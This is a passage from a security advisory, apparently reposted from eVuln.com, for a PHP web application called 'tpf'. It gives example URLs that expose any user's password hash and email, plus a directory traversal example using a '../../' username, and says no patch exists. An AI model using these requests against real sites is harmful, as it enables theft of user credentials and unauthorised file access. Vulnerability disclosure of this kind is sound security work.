2. Users information disclosure:
http://host/tpf/users/anyuser.hash
http://host/tpf/users/anyuser.email
3. Directory Traversal Example:
Registering new user.
username: http://host/tpf/profile.php?action=view&uname=../../username
--------------Solution---------------------
No Patch available.
--------------Credit---------------------
Original Advisory:
http://evuln.com/vulns/14/summary.html
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.